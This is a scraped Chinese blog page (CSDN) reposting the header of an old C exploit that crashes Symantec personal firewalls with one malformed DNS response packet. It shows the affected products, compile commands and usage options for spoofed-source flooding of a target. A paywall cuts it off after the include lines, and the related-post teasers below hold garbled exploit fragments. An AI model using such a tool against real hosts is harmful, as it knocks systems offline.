赛门铁客防火墙D.o.s攻击代码

最新推荐文章于 2021-05-02 10:21:42 发布
VIP文章 最新推荐文章于 2021-05-02 10:21:42 发布
阅读量1.8k 收藏 1
点赞数
文章标签: 防火墙 security internet header socket struct
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kgdiwss/article/details/421921
版权
       
作者:houseofdabus
名称:HOD-symantec-firewall-DoS-expl.c:
版本:Version 0.1 coded by houseofdabus
翻译:luoluo
漏洞发现:www.eEye.com
漏洞描述:http://www.eeye.com/html/Research/Advisories/AD20040512B.html

* -------------------------------------------------------------------
* 程序测试:
* - Symantec Norton Personal Firewall 2004


* 受影响产品:
* - Symantec Norton Internet Security 2002
* - Symantec Norton Internet Security 2003
* - Symantec Norton Internet Security 2004
* - Symantec Norton Internet Security Professional 2002
* - Symantec Norton Internet Security Professional 2003
* - Symantec Norton Internet Security Professional 2004
* - Symantec Norton Personal Firewall 2002
* - Symantec Norton Personal Firewall 2003
* - Symantec Norton Personal Firewall 2004
* - Symantec Client Firewall 5.01, 5.1.1
* - Symantec Client Security 1.0, 1.1, 2.0(SCF 7.1)
* - Symantec Norton AntiSpam 2004

* -------------------------------------------------------------------
* 说明:
eEye Digital Security 现已发现在 Symantec 防火墙系列产品中存在的第二个安全漏洞,该漏洞可以被远程探测,并被利用来针对受影响系统进行拒绝服务攻击. 通过发送单个恶意 DNS (UDP 端口 53)响应包给存在漏洞的主机, 攻击者可以使 Symantec DNS 响应确认代码在内核中进入死循环,直至系统崩溃。受攻击主机只能通过物理重启,才能恢复运行.

* -------------------------------------------------------------------
* 编译:
* Win32/VC++ : cl -o HOD-sym-DoS-expl HOD-sym-DoS-expl.c ws2_32.lib
* Win32/cygwin: gcc -o HOD-sym-DoS-expl HOD-sym-DoS-expl.c -lws2_32.lib
* Linux : gcc -o HOD-sym-DoS-expl HOD-sym-DoS-expl.c -Wall

* -------------------------------------------------------------------
* 命令行参数/说明:

* HOD-symantec-firewall-DoS-expl [-fi:str] [-tp:int] [-ti:str] [-n:int]

* -fi:IP From (sender) IP address
* -tp:int To (recipient) port number
* -ti:IP To (recipient) IP address
* -n:int Number of times to send message
*
*/


#ifdef _WIN32
#pragma comment(lib,"ws2_32")
#pragma pack(1)
#define WIN32_LEAN_AND_MEAN
#include <winsock2.h>
#include <ws2tcpip.h> /* IP_HDRINCL */
#include <stdio.h>
#include <stdlib.h>

#else
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <stdio.h>
#include <stdlib.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <sys/timeb.h>
最低0.47元/天 解锁文章
kgdiwss
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
从RDP爆破定位内部攻击
03-22 4684
一台没有发布任何服务到公网的服务器,却有大量的账户登录失败记录,咋一看实在有点让人费解。我们需要做的就是,从繁杂的现象中,拔丝抽茧找到有价值的信息,进一步定位攻击来源,从根源上解决攻击问题...
防火墙代码
06-12
防火墙代码 病毒防护 进程监控 c++ 很适合学习
Wi-Fi 爆重大安全漏洞,Android、iOS、Windows 等所有无线设备都不安全了
<sdffdsfsdfdfs>sfsfsfsdfsdffds</sdfsDS>Fsd
10-18 1445
点击上方“程序员大咖”,选择“置顶公众号” 关键时刻,第一时间送达! 移动设备横行的时代,Wi-Fi 已成为现代人生活的必备要素之一。但近日有计算机安全专家发现,Wi-Fi 设备的安全协议存在漏洞,如今用于保护 Wi-Fi 网络安全的保护机制已经被黑攻破,苹果、微软、谷歌、Nest 等无线设备纷纷不再安全,就现有的漏洞,黑可以轻松入侵用户装置、监听接入网络的设备
AppScan扫描安全问题解决实录-跨站点脚本编制
yaovirus的专栏
05-15 1741
问题分析 未对用户可控制的输入正确进行无害化处理,就将其放置到充当 Web 页面的输出中。这可被跨站点脚本编制攻击利用。 白话解析:攻击者将脚本作为参数发送到被攻击的接口,然后接口直接返回语句到页面,那么页面就会执行攻击者的脚本。攻击者可以利用脚本获取token、cookie等信息,进而下一步攻击。 解决方案一 Apache配置解决方案: 1开放module LoadModule security2_module modules/mod_security2.so 2添加如下配置 <If
PHP防火墙代码,防火墙 firewall iptables(示例代码)
weixin_39722946的博客
03-27 1033
firewalldFirewallD 使用服务service和区域zone来代替 iptables 的规则rule和链chain,默认情况下,有以下的区域zone可用:drop– 丢弃所有传入的网络数据包并且无回应,只有传出网络连接可用。block— 拒绝所有传入网络数据包并回应一条主机禁止的 ICMP 消息,只有传出网络连接可用。public— 只接受被选择的传入网络连接,用于公共区域。...
入侵防御之防火墙
写代码的小阿帆的博客
05-02 1060
#概述 **定义:**在两个网络之间执行访问控制策略的一个或一组安全系统,由计算机软、硬件设备组合而成。 作用: 1-保护内网中脆弱及存在安全漏洞的网络服务 2-实施安全策略,对网络通信进行访问控制 3-防止内网信息暴露 4-对内外网之间的通信进行监控审计 功能: 1-访问控制——最重要,网络安全策略 对经过防火墙的所有通信进行连通或阻断的安全控制 2-攻击防护 三层、四层攻击防护;五层功能不是很强 3-路由/交换 4-地址转换NAT 转换类型:源地址转换SNAT/目标地址转换DNAT 支持正向、反向地址转
绕过XP SP2防火墙代码
老裴
12-11 1081
Exploit:#include #include #include #include #include void setfp(char *buffer,int sz,DWORD from,DWORD fp){int i;for(i=0;iif (buffer[i]==/xb8&&*(DWORD*)(buffer+i+1)==from){*(DWORD*)(buffer+i+1)=fp;bre
ShellCode编写实例—突破防火墙的ShellCode
InkSnail的专栏
04-13 979
2008年03月30日 星期日 01:44适合读者:漏洞研究员、入侵爱好者 前置知识:C、汇编阅读能力,调试工具使用能力 WTF:最近网络上 开始流传各种各样的ShellCode,很多朋友都开始关注ShellCode的编写和相关技术的实现方法。黑防不断推出的“菜鸟版Exploit编写指 南”系列文章受到很多热爱系统漏洞的朋友们的喜爱,但大家在了解基本的漏洞调试、利用方法后,开始关注更
华为赛门克HSCSASecurity认证培训网络课程防火墙NAT.docx
12-27
华为赛门克HSCSASecurity认证培训网络课程防火墙NAT.docx
赛门克Symantec14.x和12.x
06-23
赛门克Symantec14.x和12.x各版本都有,按实际情况安装即可
防火墙代码
03-19
delphi防火墙代码
linux下 arp攻击防火墙 源码
08-27
linux下 arp攻击防火墙 源码,功能丰富,提供了1对1 1对多的通信防护,缓存保护等功能
windows防火墙-自动防御脚本
05-22
此脚本可以自动过滤掉单IP高并发攻击,自动检测,自动加入防火墙规则,只需加入计划任务即可使用
个人防火墙源程序代码
04-03
多层防火墙技术的研究与设计-----应用级网关 多层防火墙技术的研究与设计----- 包过滤 -多层防火墙技术的研究与设计-----状态检测 需要者请联系 QQ66170166 [email protected] 常年供应 0898-69965396 参考资料:http://hi.baidu.com/防火墙论文/blog 图片游览 http://shuange2.googlepages.com/fhq.jpg 需要请联系QQ66170166 详细请登陆 http://hi.baidu.com/english_dhgdh/blog 买毕业设计者 请来电 来Q咨询等 24小时值班! 诚信交易 长久着想! 毕业设计论文2万字+系统源程序+外文翻译+开题报告+中期报告+PPT+任务书+选题表+封面+附件封面+成绩评定表(全套)
简单防火墙
03-12
基于c++的网络管理软件,实现简单的防火墙功能
赛门克sep14.3.1100卸载工具
10-23
赛门克卸载工具14.3.1100
华为赛门克HSCSA_Security认证培训网络课程防火墙NAT.docx
12-27
华为赛门克HSCSA_Security认证培训网络课程防火墙NAT.docx
华为赛门克HSCSA-Security认证培训网络课程 防火墙NAT.docx
11-25
华为赛门克HSCSA-Security认证培训网络课程 防火墙NAT.docx
常见木马清除法
派的无理性
11-09 2935
常见木马清除法1. 冰河v1.1 v2.2  这是国产最好的木马 清除木马v1.1 打开注册表Regedit 点击目录至: HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run 查找以下的两个路径,并删除 " C:/windows/system/ kernel32.exe" " C:/windows/system/ s
数据中心防火墙推荐选型
最新发布
05-25
推荐的数据中心防火墙选型取决于您的具体需求和预算。以下是几个主流厂商的防火墙产品,供您参考: 1.思科ASA防火墙 思科ASA(Adaptive Security Appliance)防火墙是一款功能强大,性能卓越,易于集成和管理的防火墙。它可以提供细粒度的流量控制,支持多种VPN连接方式,具有高可靠性和高可扩展性等优点。 2.华为USG防火墙 华为USG(Unified Security Gateway)防火墙是一款高性能,全面安全的网络边界安全产品。它具有高可靠性,高可扩展性,支持多种VPN连接方式,以及强大的安全策略控制和流量管理功能。 3.迪普思防火墙 迪普思(Deep Security)防火墙是一款基于深度学习技术的智能安全产品,能够自动识别和阻止各种网络攻击,包括DDoS攻击、恶意代码和病毒等。它具有高性能和高可靠性,适用于大型数据中心和企业级网络。 4.赛门防火墙 赛门克(Symantec)防火墙是一款集成了防病毒、反间谍软件和反垃圾邮件等多种安全功能的综合性安全产品。它具有高可靠性和高可扩展性,适用于中小型企业和分支机构网络。 以上是一些主流的数据中心防火墙选型,可以根据自己的实际需求进行选择。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值